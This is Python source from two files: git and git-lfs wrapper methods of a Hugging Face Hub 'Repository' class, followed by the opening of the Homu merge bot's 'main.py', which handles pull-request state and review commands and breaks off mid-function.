def lfs_untrack(self, patterns: Union[str, List[str]]):
"""
Tell git-lfs to untrack those files.
Args:
patterns (`Union[str, List[str]]`):
The pattern, or list of patterns, to untrack with git-lfs.
"""
if isinstance(patterns, str):
patterns = [patterns]
try:
for pattern in patterns:
run_subprocess("git lfs untrack".split() + [pattern], self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def lfs_enable_largefiles(self):
"""
HF-specific. This enables upload support of files >5GB.
"""
try:
lfs_config = "git config lfs.customtransfer.multipart"
run_subprocess(f"{lfs_config}.path huggingface-cli".split(), self.local_dir)
run_subprocess(
f"{lfs_config}.args {LFS_MULTIPART_UPLOAD_COMMAND}".split(),
self.local_dir,
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def auto_track_binary_files(self, pattern: Optional[str] = ".") -> List[str]:
"""
Automatically track binary files with git-lfs.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to track files that are binary.
Returns:
`List[str]`: List of filenames that are now tracked due to being
binary files
"""
files_to_be_tracked_with_lfs = []
deleted_files = self.list_deleted_files()
for filename in files_to_be_staged(pattern, folder=self.local_dir):
if filename in deleted_files:
continue
path_to_file = os.path.join(os.getcwd(), self.local_dir, filename)
if not (is_tracked_with_lfs(path_to_file) or is_git_ignored(path_to_file)):
size_in_mb = os.path.getsize(path_to_file) / (1024 * 1024)
if size_in_mb >= 10:
logger.warning(
"Parsing a large file to check if binary or not. Tracking large"
" files using `repository.auto_track_large_files` is"
" recommended so as to not load the full file in memory."
)
is_binary = is_binary_file(path_to_file)
if is_binary:
self.lfs_track(filename)
files_to_be_tracked_with_lfs.append(filename)
# Cleanup the .gitattributes if files were deleted
self.lfs_untrack(deleted_files)
return files_to_be_tracked_with_lfs
def auto_track_large_files(self, pattern: Optional[str] = ".") -> List[str]:
"""
Automatically track large files (files that weigh more than 10MBs) with
git-lfs.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to track files that are above 10MBs.
Returns:
`List[str]`: List of filenames that are now tracked due to their
size.
"""
files_to_be_tracked_with_lfs = []
deleted_files = self.list_deleted_files()
for filename in files_to_be_staged(pattern, folder=self.local_dir):
if filename in deleted_files:
continue
path_to_file = os.path.join(os.getcwd(), self.local_dir, filename)
size_in_mb = os.path.getsize(path_to_file) / (1024 * 1024)
if (
size_in_mb >= 10
and not is_tracked_with_lfs(path_to_file)
and not is_git_ignored(path_to_file)
):
self.lfs_track(filename)
files_to_be_tracked_with_lfs.append(filename)
# Cleanup the .gitattributes if files were deleted
self.lfs_untrack(deleted_files)
return files_to_be_tracked_with_lfs
def lfs_prune(self, recent=False):
"""
git lfs prune
Args:
recent (`bool`, *optional*, defaults to `False`):
Whether to prune files even if they were referenced by recent
commits. See the following
[link](https://github.com/git-lfs/git-lfs/blob/f3d43f0428a84fc4f1e5405b76b5a73ec2437e65/docs/man/git-lfs-prune.1.ronn#recent-files)
for more information.
"""
args = "git lfs prune".split()
if recent:
args.append("--recent")
try:
with _lfs_log_progress():
result = run_subprocess(
args,
self.local_dir,
)
logger.info(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_pull(self, rebase: Optional[bool] = False, lfs: Optional[bool] = False):
"""
git pull
Args:
rebase (`bool`, *optional*, defaults to `False`):
Whether to rebase the current branch on top of the upstream
branch after fetching.
lfs (`bool`, *optional*, defaults to `False`):
Whether to fetch the LFS files too. This option only changes the
behavior when a repository was cloned without fetching the LFS
files; calling `repo.git_pull(lfs=True)` will then fetch the LFS
file from the remote repository.
"""
command = ("git pull" if not lfs else "git lfs pull").split()
if rebase:
command.append("--rebase")
try:
with _lfs_log_progress():
result = run_subprocess(
command,
self.local_dir,
)
logger.info(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_add(
self, pattern: Optional[str] = ".", auto_lfs_track: Optional[bool] = False
):
"""
git add
Setting the `auto_lfs_track` parameter to `True` will automatically
track files that are larger than 10MB with `git-lfs`.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to add files to staging.
auto_lfs_track (`bool`, *optional*, defaults to `False`):
Whether to automatically track large and binary files with
git-lfs. Any file over 10MB in size, or in binary format, will
be automatically tracked.
"""
if auto_lfs_track:
# Track files according to their size (>=10MB)
tracked_files = self.auto_track_large_files(pattern)
# Read the remaining files and track them if they're binary
tracked_files.extend(self.auto_track_binary_files(pattern))
if tracked_files:
logger.warning(
f"Adding files tracked by Git LFS: {tracked_files}. This may take a"
" bit of time if the files are large."
)
try:
result = run_subprocess("git add -v".split() + [pattern], self.local_dir)
logger.info(f"Adding to index:\n{result.stdout}\n")
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_commit(self, commit_message: str = "commit files to HF hub"):
"""
git commit
Args:
commit_message (`str`, *optional*, defaults to "commit files to HF hub"):
The message attributed to the commit.
"""
try:
result = run_subprocess(
"git commit -v -m".split() + [commit_message], self.local_dir
)
logger.info(f"Committed:\n{result.stdout}\n")
except subprocess.CalledProcessError as exc:
if len(exc.stderr) > 0:
raise EnvironmentError(exc.stderr)
else:
raise EnvironmentError(exc.stdout)
def git_push(
self,
upstream: Optional[str] = None,
blocking: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
) -> Union[str, Tuple[str, CommandInProgress]]:
"""
git push
If used without setting `blocking`, will return url to commit on remote
repo. If used with `blocking=True`, will return a tuple containing the
url to commit and the command object to follow for information about the
process.
Args:
upstream (`str`, *optional*):
Upstream to which this should push. If not specified, will push
to the lastly defined upstream or to the default one (`origin
main`).
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the push has
finished. Setting this to `False` will return an
`CommandInProgress` object which has an `is_done` property. This
property will be set to `True` when the push is finished.
auto_lfs_prune (`bool`, *optional*, defaults to `False`):
Whether to automatically prune files once they have been pushed
to the remote.
"""
command = "git push"
if upstream:
command += f" --set-upstream {upstream}"
number_of_commits = commits_to_push(self.local_dir, upstream)
if number_of_commits > 1:
logger.warning(
f"Several commits ({number_of_commits}) will be pushed upstream."
)
if blocking:
logger.warning("The progress bars may be unreliable.")
try:
with _lfs_log_progress():
process = subprocess.Popen(
command.split(),
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding="utf-8",
cwd=self.local_dir,
)
if blocking:
stdout, stderr = process.communicate()
return_code = process.poll()
process.kill()
if len(stderr):
logger.warning(stderr)
if return_code:
raise subprocess.CalledProcessError(
return_code, process.args, output=stdout, stderr=stderr
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if not blocking:
def status_method():
status = process.poll()
if status is None:
return -1
else:
return status
command = CommandInProgress(
"push",
is_done_method=lambda: process.poll() is not None,
status_method=status_method,
process=process,
post_method=self.lfs_prune if auto_lfs_prune else None,
)
self.command_queue.append(command)
return self.git_head_commit_url(), command
if auto_lfs_prune:
self.lfs_prune()
return self.git_head_commit_url()
def git_checkout(self, revision: str, create_branch_ok: Optional[bool] = False):
"""
git checkout a given revision
Specifying `create_branch_ok` to `True` will create the branch to the
given revision if that revision doesn't exist.
Args:
revision (`str`):
The revision to checkout.
create_branch_ok (`str`, *optional*, defaults to `False`):
Whether creating a branch named with the `revision` passed at
the current checked-out reference if `revision` isn't an
existing revision is allowed.
"""
command = f"git checkout {revision}"
try:
result = run_subprocess(command.split(), self.local_dir)
logger.warning(f"Checked out {revision} from {self.current_branch}.")
logger.warning(result.stdout)
except subprocess.CalledProcessError as exc:
if not create_branch_ok:
raise EnvironmentError(exc.stderr)
else:
command = f"git checkout -b {revision}"
try:
result = run_subprocess(command.split(), self.local_dir)
logger.warning(
f"Revision `{revision}` does not exist. Created and checked out"
f" branch `{revision}`."
)
logger.warning(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def tag_exists(self, tag_name: str, remote: Optional[str] = None) -> bool:
"""
Check if a tag exists or not.
Args:
tag_name (`str`):
The name of the tag to check.
remote (`str`, *optional*):
Whether to check if the tag exists on a remote. This parameter
should be the identifier of the remote.
Returns:
`bool`: Whether the tag exists.
"""
if remote:
try:
result = run_subprocess(
f"git ls-remote origin refs/tags/{tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return len(result) != 0
else:
try:
git_tags = run_subprocess(
"git tag".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
git_tags = git_tags.split("\n")
return tag_name in git_tags
def delete_tag(self, tag_name: str, remote: Optional[str] = None) -> bool:
"""
Delete a tag, both local and remote, if it exists
Args:
tag_name (`str`):
The tag name to delete.
remote (`str`, *optional*):
The remote on which to delete the tag.
Returns:
`bool`: `True` if deleted, `False` if the tag didn't exist.
If remote is not passed, will just be updated locally
"""
delete_locally = True
delete_remotely = True
if not self.tag_exists(tag_name):
delete_locally = False
if not self.tag_exists(tag_name, remote=remote):
delete_remotely = False
if delete_locally:
try:
run_subprocess(
["git", "tag", "-d", tag_name], self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if remote and delete_remotely:
try:
run_subprocess(
f"git push {remote} --delete {tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return True
def add_tag(self, tag_name: str, message: str = None, remote: Optional[str] = None):
"""
Add a tag at the current head and push it
If remote is None, will just be updated locally
If no message is provided, the tag will be lightweight. if a message is
provided, the tag will be annotated.
Args:
tag_name (`str`):
The name of the tag to be added.
message (`str`, *optional*):
The message that accompanies the tag. The tag will turn into an
annotated tag if a message is passed.
remote (`str`, *optional*):
The remote on which to add the tag.
"""
if message:
tag_args = ["git", "tag", "-a", tag_name, "-m", message]
else:
tag_args = ["git", "tag", tag_name]
try:
run_subprocess(tag_args, self.local_dir).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if remote:
try:
run_subprocess(
f"git push {remote} {tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def is_repo_clean(self) -> bool:
"""
Return whether or not the git status is clean or not
Returns:
`bool`: `True` if the git status is clean, `False` otherwise.
"""
try:
git_status = run_subprocess(
"git status --porcelain".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return len(git_status) == 0
def push_to_hub(
self,
commit_message: Optional[str] = "commit files to HF hub",
blocking: Optional[bool] = True,
clean_ok: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
) -> Optional[str]:
"""
Helper to add, commit, and push files to remote repository on the
HuggingFace Hub. Will automatically track large files (>10MB).
Args:
commit_message (`str`):
Message to use for the commit.
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the `git push` has
finished.
clean_ok (`bool`, *optional*, defaults to `True`):
If True, this function will return None if the repo is
untouched. Default behavior is to fail because the git command
fails.
auto_lfs_prune (`bool`, *optional*, defaults to `False`):
Whether to automatically prune files once they have been pushed
to the remote.
"""
if clean_ok and self.is_repo_clean():
logger.info("Repo currently clean. Ignoring push_to_hub")
return None
self.git_add(auto_lfs_track=True)
self.git_commit(commit_message)
return self.git_push(
upstream=f"origin {self.current_branch}",
blocking=blocking,
auto_lfs_prune=auto_lfs_prune,
)
@contextmanager
def commit(
self,
commit_message: str,
branch: Optional[str] = None,
track_large_files: Optional[bool] = True,
blocking: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
):
"""
Context manager utility to handle committing to a repository. This
automatically tracks large files (>10Mb) with git-lfs. Set the
`track_large_files` argument to `False` if you wish to ignore that
behavior.
Args:
commit_message (`str`):
Message to use for the commit.
branch (`str`, *optional*):
The branch on which the commit will appear. This branch will be
checked-out before any operation.
track_large_files (`bool`, *optional*, defaults to `True`):
Whether to automatically track large files or not. Will do so by
default.
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the `git push` has
finished.
auto_lfs_prune (`bool`, defaults to `True`):
Whether to automatically prune files once they have been pushed
to the remote.
Examples:
```python
>>> with Repository(
... "text-files",
... clone_from="<user>/text-files",
... use_auth_token=True,
>>> ).commit("My first file :)"):
... with open("file.txt", "w+") as f:
... f.write(json.dumps({"hey": 8}))
>>> import torch
>>> model = torch.nn.Transformer()
>>> with Repository(
... "torch-model",
... clone_from="<user>/torch-model",
... use_auth_token=True,
>>> ).commit("My cool model :)"):
... torch.save(model.state_dict(), "model.pt")
```
"""
files_to_stage = files_to_be_staged(".", folder=self.local_dir)
if len(files_to_stage):
if len(files_to_stage) > 5:
files_to_stage = str(files_to_stage[:5])[:-1] + ", ...]"
logger.error(
"There exists some updated files in the local repository that are not"
f" committed: {files_to_stage}. This may lead to errors if checking out"
" a branch. These files and their modifications will be added to the"
" current commit."
)
if branch is not None:
self.git_checkout(branch, create_branch_ok=True)
if is_tracked_upstream(self.local_dir):
logger.warning("Pulling changes ...")
self.git_pull(rebase=True)
else:
logger.warning(
"The current branch has no upstream branch. Will push to 'origin"
f" {self.current_branch}'"
)
current_working_directory = os.getcwd()
os.chdir(os.path.join(current_working_directory, self.local_dir))
try:
yield self
finally:
self.git_add(auto_lfs_track=track_large_files)
try:
self.git_commit(commit_message)
except OSError as e:
# If no changes are detected, there is nothing to commit.
if "nothing to commit" not in str(e):
raise e
try:
self.git_push(
upstream=f"origin {self.current_branch}",
blocking=blocking,
auto_lfs_prune=auto_lfs_prune,
)
except OSError as e:
# If no changes are detected, there is nothing to commit.
if "could not read Username" in str(e):
raise OSError(
"Couldn't authenticate user for push. Did you set"
" `use_auth_token` to `True`?"
) from e
else:
raise e
os.chdir(current_working_directory)
def repocard_metadata_load(self) -> Optional[Dict]:
filepath = os.path.join(self.local_dir, REPOCARD_NAME)
if os.path.isfile(filepath):
return metadata_load(filepath)
def repocard_metadata_save(self, data: Dict) -> None:
return metadata_save(os.path.join(self.local_dir, REPOCARD_NAME), data)
@property
def commands_failed(self):
"""
Returns the asynchronous commands that failed.
"""
return [c for c in self.command_queue if c.status > 0]
@property
def commands_in_progress(self):
"""
Returns the asynchronous commands that are currently in progress.
"""
return [c for c in self.command_queue if not c.is_done]
def wait_for_commands(self):
"""
Blocking method: blocks all subsequent execution until all commands have
been processed.
"""
index = 0
for command_failed in self.commands_failed:
logger.error(
f"The {command_failed.title} command with PID"
f" {command_failed._process.pid} failed."
)
logger.error(command_failed.stderr)
while self.commands_in_progress:
if index % 10 == 0:
logger.error(
"Waiting for the following commands to finish before shutting"
f" down: {self.commands_in_progress}."
)
index += 1
time.sleep(1)
|
main.py
|
import argparse
import github3
import toml
import json
import re
import functools
from . import comments
from . import utils
from .parse_issue_comment import parse_issue_comment
from .auth import verify as verify_auth
from .utils import lazy_debug
import logging
from threading import Thread, Lock, Timer
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from queue import Queue
import os
import sys
from enum import IntEnum, Enum
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import random
import weakref
STATUS_TO_PRIORITY = {
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
'success': 6,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
DEFAULT_TEST_TIMEOUT = 3600 * 10
VARIABLES_RE = re.compile(r'\${([a-zA-Z_]+)}')
IGNORE_BLOCK_START = '<!-- homu-ignore:start -->'
IGNORE_BLOCK_END = '<!-- homu-ignore:end -->'
IGNORE_BLOCK_RE = re.compile(
r'<!--\s*homu-ignore:start\s*-->'
r'.*'
r'<!--\s*homu-ignore:end\s*-->',
flags=re.MULTILINE | re.DOTALL | re.IGNORECASE
)
global_cfg = {}
# Replace @mention with `@mention` to suppress pings in merge commits.
# Note: Don't replace non-mentions like "email@gmail.com".
def suppress_pings(text):
return re.sub(r'\B(@\S+)', r'`\g<1>`', text) # noqa
# Replace any text between IGNORE_BLOCK_START and IGNORE_BLOCK_END
# HTML comments with an empty string in merge commits
def suppress_ignore_block(text):
return IGNORE_BLOCK_RE.sub('', text)
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(
repo_cfg['buildbot']['url'] + '/login',
allow_redirects=False,
data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class Repository:
treeclosed = -1
treeclosed_src = None
gh = None
gh_test_on_fork = None
label = None
db = None
def __init__(self, gh, repo_label, db):
self.gh = gh
self.repo_label = repo_label
self.db = db
db_query(
db,
'SELECT treeclosed, treeclosed_src FROM repos WHERE repo = ?',
[repo_label]
)
row = db.fetchone()
if row:
self.treeclosed = row[0]
self.treeclosed_src = row[1]
else:
self.treeclosed = -1
self.treeclosed_src = None
def update_treeclosed(self, value, src):
self.treeclosed = value
self.treeclosed_src = src
db_query(
self.db,
'DELETE FROM repos where repo = ?',
[self.repo_label]
)
if value > 0:
db_query(
self.db,
'''
INSERT INTO repos (repo, treeclosed, treeclosed_src)
VALUES (?, ?, ?)
''',
[self.repo_label, value, src]
)
def __lt__(self, other):
return self.gh < other.gh
class PullReqState:
num = 0
priority = 0
rollup = 0
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que,
gh, owner, name, label_events, repos, test_on_fork):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.timeout_timer = None
self.test_started = time.time()
self.label_events = label_events
self.test_on_fork = test_on_fork
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
fmt = 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'
return fmt.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
-self.priority,
self.rollup,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, comment):
if isinstance(comment, comments.Comment):
comment = "%s\n<!-- homu: %s -->" % (
comment.render(), comment.jsonify(),
)
self.get_issue().create_comment(comment)
def change_labels(self, event):
event = self.label_events.get(event.value, {})
removes = event.get('remove', [])
adds = event.get('add', [])
unless = event.get('unless', [])
if not removes and not adds:
return
issue = self.get_issue()
labels = {label.name for label in issue.iter_labels()}
if labels.isdisjoint(unless):
labels.difference_update(removes)
labels.update(adds)
issue.replace_labels(list(labels))
def set_status(self, status):
self.status = status
if self.timeout_timer:
self.timeout_timer.cancel()
self.timeout_timer = None
db_query(
self.db,
'UPDATE pull SET status = ? WHERE repo = ? AND num = ?',
[self.status, self.repo_label, self.num]
)
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(
self.db,
'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?',
[self.merge_sha, self.repo_label, self.num]
)
def get_status(self):
if self.status == '' and self.approved_by:
if self.mergeable is not False:
return 'approved'
return self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(
self.db,
'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', # noqa
[self.repo_label, self.num, self.mergeable]
)
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(
self.db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(
self.db,
'DELETE FROM build_res WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(
self.db,
'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label].gh
if not repo:
repo = self.gh.repository(self.owner, self.name)
self.repos[self.repo_label].gh = repo
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def get_test_on_fork_repo(self):
if not self.test_on_fork:
return None
repo = self.repos[self.repo_label].gh_test_on_fork
if not repo:
repo = self.gh.repository(
self.test_on_fork['owner'],
self.test_on_fork['name'],
)
self.repos[self.repo_label].gh_test_on_fork = repo
assert repo.owner.login == self.test_on_fork['owner']
assert repo.name == self.test_on_fork['name']
return repo
def save(self):
db_query(
self.db,
'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = suppress_pings(issue.body)
self.body = suppress_ignore_block(self.body)
def fake_merge(self, repo_cfg):
if not repo_cfg.get('linear', False):
return
if repo_cfg.get('autosquash', False):
return
issue = self.get_issue()
title = issue.title
# We tell github to close the PR via the commit message, but it
# doesn't know that constitutes a merge. Edit the title so that it's
# clearer.
merged_prefix = '[merged] '
if not title.startswith(merged_prefix):
title = merged_prefix + title
issue.edit(title=title)
def change_treeclosed(self, value, src):
self.repos[self.repo_label].update_treeclosed(value, src)
def blocked_by_closed_tree(self):
treeclosed = self.repos[self.repo_label].treeclosed
return treeclosed if self.priority < treeclosed else None
def start_testing(self, timeout):
self.test_started = time.time() # FIXME: Save in the local database
self.set_status('pending')
wm = weakref.WeakMethod(self.timed_out)
def timed_out():
m = wm()
if m:
m()
timer = Timer(timeout, timed_out)
timer.start()
self.timeout_timer = timer
def timed_out(self):
print('* Test timed out: {}'.format(self))
self.merge_sha = ''
self.save()
self.set_status('failure')
utils.github_create_status(
self.get_repo(),
self.head_sha,
'failure',
'',
'Test timed out',
context='homu')
self.add_comment(comments.TimedOut())
self.change_labels(LabelEvent.TIMED_OUT)
def record_retry_log(self, src, body):
# destroy ancient records
db_query(
self.db,
"DELETE FROM retry_log WHERE repo = ? AND time < date('now', ?)",
[self.repo_label, global_cfg.get('retry_log_expire', '-42 days')],
)
db_query(
self.db,
'INSERT INTO retry_log (repo, num, src, msg) VALUES (?, ?, ?, ?)',
[self.repo_label, self.num, src, body],
)
@property
def author(self):
"""
Get the GitHub login name of the author of the pull request
"""
return self.get_issue().user.login
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
class AuthState(IntEnum):
# Higher is more privileged
REVIEWER = 3
TRY = 2
NONE = 1
class LabelEvent(Enum):
APPROVED = 'approved'
REJECTED = 'rejected'
CONFLICT = 'conflict'
SUCCEED = 'succeed'
FAILED = 'failed'
TRY = 'try'
TRY_SUCCEED = 'try_succeed'
TRY_FAILED = 'try_failed'
EXEMPTED = 'exempted'
TIMED_OUT = 'timed_out'
INTERRUPTED = 'interrupted'
PUSHED = 'pushed'
PORTAL_TURRET_DIALOG = ["Target acquired", "Activated", "There you are"]
PORTAL_TURRET_IMAGE = "https://cloud.githubusercontent.com/assets/1617736/22222924/c07b2a1c-e16d-11e6-91b3-ac659550585c.png" # noqa
def parse_commands(body, username, user_id, repo_label, repo_cfg, state,
my_username, db, states, *, realtime=False, sha='',
command_src=''):
global global_cfg
state_changed = False
_reviewer_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.REVIEWER,
realtime,
my_username,
)
_try_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.TRY,
realtime,
my_username,
)
hooks = []
if 'hooks' in global_cfg:
hooks = list(global_cfg['hooks'].keys())
commands = parse_issue_comment(username, body, sha, my_username, hooks)
for command in commands:
found = True
if command.action == 'approve':
if not _reviewer_auth_verified():
continue
approver = command.actor
cur_sha = command.commit
# Ignore WIP PRs
is_wip = False
for wip_kw in ['WIP', 'TODO', '[WIP]', '[TODO]', '[DO NOT MERGE]']:
if state.title.upper().startswith(wip_kw):
if realtime:
state.add_comment(comments.ApprovalIgnoredWip(
sha=state.head_sha,
wip_keyword=wip_kw,
))
is_wip = True
break
if is_wip:
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000
# through the webhook. This is called a "null commit", and
# seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits
# in a PR. In this case, we just try to retrieve the head
# SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime:
state.add_comment(
':bangbang: Invalid head SHA found, retrying: `{}`'
.format(state.head_sha)
)
state.head_sha = state.get_repo().pull_request(state.num).head.sha # noqa
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') # noqa
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') # noqa
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) # noqa
if lines:
lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') # noqa
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.try_ = False
state.set_status('')
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(
':scream_cat: {} Please try again with `{}`.'
.format(msg, state.head_sha)
)
else:
state.add_comment(comments.Approved(
sha=state.head_sha,
approver=approver,
bot=my_username,
))
treeclosed = state.blocked_by_closed_tree()
if treeclosed:
state.add_comment(
':evergreen_tree: The tree is currently closed for pull requests below priority {}, this pull request will be tested once the tree is reopened' # noqa
.format(treeclosed)
)
state.change_labels(LabelEvent.APPROVED)
elif command.action == 'unapprove':
# Allow the author of a pull request to unapprove their own PR. The
# author can already perform other actions that effectively
# unapprove the PR (change the target branch, push more commits,
# etc.) so allowing them to directly unapprove it is also allowed.
# Because verify_auth has side-effects (especially, it may leave a
# comment on the pull request if the user is not authorized), we
# need to do the author check BEFORE the verify_auth check.
if state.author != username:
if not verify_auth(username, user_id, repo_label, repo_cfg,
state, AuthState.REVIEWER, realtime,
my_username):
continue
state.approved_by = ''
state.save()
if realtime:
state.change_labels(LabelEvent.REJECTED)
elif command.action == 'prioritize':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.TRY, realtime, my_username):
continue
pvalue = command.priority
if pvalue > global_cfg['max_priority']:
if realtime:
state.add_comment(
':stop_sign: Priority higher than {} is ignored.'
.format(global_cfg['max_priority'])
)
continue
state.priority = pvalue
state.save()
elif command.action == 'delegate':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.REVIEWER, realtime, my_username):
continue
state.delegate = command.delegate_to
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'undelegate':
# TODO: why is this a TRY?
if not _try_auth_verified():
continue
state.delegate = ''
state.save()
elif command.action == 'delegate-author':
if not _reviewer_auth_verified():
continue
state.delegate = state.get_repo().pull_request(state.num).user.login # noqa
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'retry' and realtime:
if not _try_auth_verified():
continue
state.set_status('')
if realtime:
event = LabelEvent.TRY if state.try_ else LabelEvent.APPROVED
state.record_retry_log(command_src, body)
state.change_labels(event)
elif command.action in ['try', 'untry'] and realtime:
if not _try_auth_verified():
continue
if state.status == '' and state.approved_by:
state.add_comment(
':no_good: '
'Please do not `try` after a pull request has been `r+`ed.'
' If you need to `try`, unapprove (`r-`) it first.'
)
continue
state.try_ = command.action == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
if realtime and state.try_:
# If we've tried before, the status will be 'success', and this
# new try will not be picked up. Set the status back to ''
# so the try will be run again.
state.set_status('')
# `try-` just resets the `try` bit and doesn't correspond to
# any meaningful labeling events.
state.change_labels(LabelEvent.TRY)
elif command.action == 'rollup':
if not _try_auth_verified():
continue
state.rollup = command.rollup_value
state.save()
elif command.action == 'force' and realtime:
if not _try_auth_verified():
continue
if 'buildbot' in repo_cfg:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(
repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', # noqa
allow_redirects=False,
data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())), # noqa
